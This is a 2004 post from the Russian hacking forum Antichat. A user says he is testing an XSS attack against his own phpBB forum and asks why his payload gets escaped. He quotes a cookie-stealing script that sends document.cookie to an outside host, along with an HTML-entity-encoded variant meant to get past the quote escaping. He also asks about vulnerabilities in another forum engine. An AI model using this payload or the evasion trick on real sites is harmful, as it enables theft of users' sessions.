ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Кто рубит в xss!
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #1  
Старый 30.10.2004, 00:46
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
Smile
Решил попробовать взломать свой форум на phpBB с помощью xss-уязвимости (для sql-баги, нужно чтобы была возможность пересылать приваты, а это есть не везде). Долго мучался, но так нефига и не получилось. Если вводить так(брал любую описанную xss-багу):<script&gt;document.location=&quot;http://www.asd.as/as.php?xack=&quot;+docu...lt;/script&gt;, то скрипт добавляет слеши перед каждой ковычкой. А если так (в 10'ой кодировке):<script&gt;document.location&a mp;#61&amp;#34www.asd.as/as.php?xack&amp;#61&amp;#34&amp;#43document.cookie &lt;/script&gt;, то строка выполняется только до &quot;<script&gt;document.location=&quot; и соответственно нарушается синтаксиc штмл, и весь остальной код не воспроизводится. Объясните где логика?
PS Кто нибудь слышал про движок textus? Есть ли там уязвимости?
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ